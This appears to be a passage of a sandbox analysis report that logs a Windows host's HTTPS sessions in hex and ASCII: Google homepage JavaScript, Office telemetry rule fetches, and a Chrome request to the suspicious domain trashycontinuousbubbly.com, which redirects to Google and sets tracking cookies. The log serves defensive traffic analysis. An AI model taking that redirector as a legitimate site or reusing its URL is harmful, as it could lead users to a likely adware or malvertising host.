Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; expires=Tue, 06-May-2025 06:33:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK; expires=Fri, 09-May-2025 06:33:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 06:33:19 UTC	1764	IN	Data Raw: 32 37 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e Data Ascii: 2717<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>
2024-11-07 06:33:19 UTC	1764	IN	Data Raw: 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 62 3b 72 65 74 75 72 6e 20 74 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29 2e 78 7c 7c 28 64 2e 78 3d 66 Data Ascii: ,d,k));if(c=r(c)){a=new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x\|\|(d.x=f
2024-11-07 06:33:19 UTC	1764	IN	Data Raw: 26 22 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2c 61 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 6e 73 2c 74 3d 72 3f 61 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 28 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 70 6e 6f 7c 7c 30 29 7d 76 61 72 20 62 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 72 73 2c Data Ascii: &"navigationStart"in window.performance.timing,aa=google.stvsc&&google.stvsc.ns,t=r?aa\|\|window.performance.timing.navigationStart:void 0;function u(){return window.performance.now()-(google.stvsc&&google.stvsc.pno\|\|0)}var ba=google.stvsc&&google.stvsc.rs,
2024-11-07 06:33:19 UTC	1764	IN	Data Raw: 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 64 7c 7c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 62 2c 63 29 7d 3b 76 61 72 20 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 67 3d 61 3b 74 68 69 73 2e 76 3d 5b 5d 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 67 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 61 66 74 22 29 3b 74 68 69 73 2e 6a 3d 21 21 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 65 66 65 72 72 65 64 22 29 3b 76 61 72 20 64 3b 69 66 28 64 3d 21 74 68 69 73 2e 6a 29 61 3a 7b 66 6f 72 28 64 3d 30 3b 64 3c 44 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 69 66 28 61 2e 67 65 74 41 74 74 72 69 Data Ascii: oveEventListener(b,c,d\|\|!1):a.attachEvent&&a.detachEvent("on"+b,c)};var pa=function(a,b,c){this.g=a;this.v=[];this.B=this.g.hasAttribute("data-noaft");this.j=!!this.g.getAttribute("data-deferred");var d;if(d=!this.j)a:{for(d=0;d<D.length;++d)if(a.getAttri
2024-11-07 06:33:19 UTC	1764	IN	Data Raw: 63 3d 30 2c 64 3d 62 2e 6c 65 6e 67 74 68 3b 63 3c 64 3b 2b 2b 63 29 61 28 49 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 47 28 49 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d Data Ascii: c=0,d=b.length;c<d;++c)a(I(b[c]))};function ra(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();G(I(a,void 0,!0,!0),b)}}function K(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}
2024-11-07 06:33:19 UTC	1195	IN	Data Raw: 61 6e 67 65 22 2c 51 2c 21 30 29 3b 50 28 30 29 3b 78 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 3d 72 61 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6c 6f 61 64 22 2c 4b 2c 21 30 29 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 65 72 72 6f 72 22 2c 4b 2c 21 30 29 29 3b 67 6f 6f 67 6c 65 2e 63 76 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 69 66 28 21 61 7c 7c 21 62 26 26 64 61 28 61 29 29 72 65 74 75 72 6e 20 30 3b 69 66 28 21 61 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 Data Ascii: ange",Q,!0);P(0);x&&(google.c.oil=ra,B(document.documentElement,"load",K,!0),B(document.documentElement,"error",K,!0));google.cv=function(a,b,c,d){if(!a\|\|!b&&da(a))return 0;if(!a.getBoundingClientRect)return 1;var e=function(h){return h.getBoundingClientR
2024-11-07 06:33:19 UTC	214	IN	Data Raw: 64 30 0d 0a 30 29 29 7d 64 3e 30 26 26 28 63 2e 67 73 61 73 72 74 3d 62 2e 74 2e 73 74 61 72 74 2d 64 29 3b 62 3d 62 2e 65 3b 61 3d 22 2f 67 65 6e 5f 32 30 34 3f 73 3d 22 2b 67 6f 6f 67 6c 65 2e 73 6e 2b 22 26 74 3d 22 2b 61 2b 22 26 61 74 79 70 3d 63 73 69 26 65 69 3d 22 2b 67 6f 6f 67 6c 65 2e 6b 45 49 2b 22 26 72 74 3d 22 3b 64 3d 22 22 3b 66 6f 72 28 76 61 72 20 66 20 69 6e 20 63 29 61 2b 3d 22 22 2b 64 2b 66 2b 22 2e 22 2b 63 5b 66 5d 2c 64 3d 22 2c 22 3b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 62 29 61 2b 3d 22 26 22 2b 67 2b 22 3d 22 2b 62 5b 67 5d 3b 66 3d 61 3b 67 3d 22 22 3b 61 3d 5b 5d 3b 70 2e 5f 63 73 68 69 64 26 26 0d 0a Data Ascii: d00))}d>0&&(c.gsasrt=b.t.start-d);b=b.e;a="/gen_204?s="+google.sn+"&t="+a+"&atyp=csi&ei="+google.kEI+"&rt=";d="";for(var f in c)a+=""+d+f+"."+c[f],d=",";for(var g in b)a+="&"+g+"="+b[g];f=a;g="";a=[];p._cshid&&
2024-11-07 06:33:19 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 0a 61 2e 70 75 73 68 28 5b 22 63 73 68 69 64 22 2c 70 2e 5f 63 73 68 69 64 5d 29 3b 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 21 3d 3d 76 6f 69 64 20 30 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 21 3d 3d 76 6f 69 64 20 30 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 21 3d 3d 30 3f 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 3a 6e 75 6c 6c 3b 62 21 3d 6e 75 6c 6c 26 26 61 2e 70 75 73 68 28 5b 22 6f 70 69 22 2c 62 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 66 6f 72 28 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 69 66 28 62 3d 3d 3d 30 7c 7c 62 3e 30 29 67 2b 3d 22 26 22 3b 67 2b 3d 61 5b 62 5d 5b 30 5d 2b 22 3d 22 2b 61 5b 62 5d 5b 31 5d 7d 61 3d 66 2b 67 3b 28 66 3d 67 6f 6f 67 Data Ascii: 8000a.push(["cshid",p._cshid]);b=window.google!==void 0&&window.google.kOPI!==void 0&&window.google.kOPI!==0?window.google.kOPI:null;b!=null&&a.push(["opi",b.toString()]);for(b=0;b<a.length;b++){if(b===0\|\|b>0)g+="&";g+=a[b][0]+"="+a[b][1]}a=f+g;(f=goog
2024-11-07 06:33:19 UTC	1378	IN	Data Raw: 29 29 7d 7d 3b 76 61 72 20 7a 61 3d 21 31 2c 58 3d 30 2c 59 3d 30 2c 5a 3b 66 75 6e 63 74 69 6f 6e 20 41 61 28 61 2c 62 29 7b 6e 61 26 26 21 67 6f 6f 67 6c 65 2e 63 2e 77 68 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 77 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 2c 67 6f 6f 67 6c 65 2e 63 2e 77 68 26 26 41 28 22 77 68 75 22 2c 22 31 22 29 29 3b 76 61 72 20 63 3d 67 6f 6f 67 6c 65 2e 63 2e 77 68 2c 64 3d 21 62 3b 62 3d 62 3f 4d 61 74 68 2e 66 6c 6f 6f 72 28 62 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 74 6f 70 2b 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 Data Ascii: ))}};var za=!1,X=0,Y=0,Z;function Aa(a,b){na&&!google.c.wh&&(google.c.wh=Math.floor(window.innerHeight\|\|document.documentElement.clientHeight),google.c.wh&&A("whu","1"));var c=google.c.wh,d=!b;b=b?Math.floor(b.getBoundingClientRect().top+window.pageYOffse
2024-11-07 06:33:19 UTC	1378	IN	Data Raw: 29 3b 64 2e 67 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 74 66 22 2c 53 74 72 69 6e 67 28 65 29 29 3b 72 65 74 75 72 6e 20 79 26 26 21 64 2e 42 26 26 28 21 64 2e 6c 7c 7c 64 2e 46 7c 7c 21 21 28 46 28 64 29 26 31 29 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 64 29 7b 79 26 26 7a 28 22 69 6d 6c 22 2c 64 7c 7c 61 29 3b 67 6f 6f 67 6c 65 2e 63 2e 75 28 22 69 6d 6c 22 29 7d 42 61 7c 7c 28 67 6f 6f 67 6c 65 2e 63 2e 62 28 22 69 6d 6c 22 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 78 61 28 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 63 29 7d 28 30 29 2c 42 61 3d 21 30 29 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 69 66 28 21 78 7c 7c 77 29 67 6f 6f 67 6c 65 2e 63 2e 73 65 74 75 70 3d 43 61 3b 7d 29 2e 63 61 6c Data Ascii: );d.g.setAttribute("data-atf",String(e));return y&&!d.B&&(!d.l\|\|d.F\|\|!!(F(d)&1))}function c(d){y&&z("iml",d\|\|a);google.c.u("iml")}Ba\|\|(google.c.b("iml"),function(){xa(b,function(){},c)}(0),Ba=!0)};google.c.ub=function(){};if(!x\|\|w)google.c.setup=Ca;}).cal

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:19 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063319Z-16547b76f7f775p5hC1DFWzdvn00000007r000000000awzw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:19 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49854	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	714	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 06:33:19 UTC	971	IN	HTTP/1.1 302 Found Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Location: https://www.google.com/ Set-Cookie: u_pl23778734=1; expires=Fri, 08 Nov 2024 06:33:19 GMT; path=/ Set-Cookie: backurled=dfdceae1749487fe3ee94c1a351e9103; expires=Thu, 07 Nov 2024 06:34:19 GMT; path=/ Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 9a24d94bdd875b14ce688bf77004fa12 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:20 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 8a6a5294-101e-007a-5edd-30047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063320Z-15869dbbcc662ldwhC1DFWbd5g000000014g00000000f9c8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:20 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:19 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:20 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063320Z-16547b76f7f7lhvnhC1DFWa2k000000007n000000000c830 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:20 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:20 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: b30de5cd-801e-00ac-33e1-2ffd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063320Z-17df447cdb57srlrhC1DFWwgas000000043g0000000077b2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:20 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
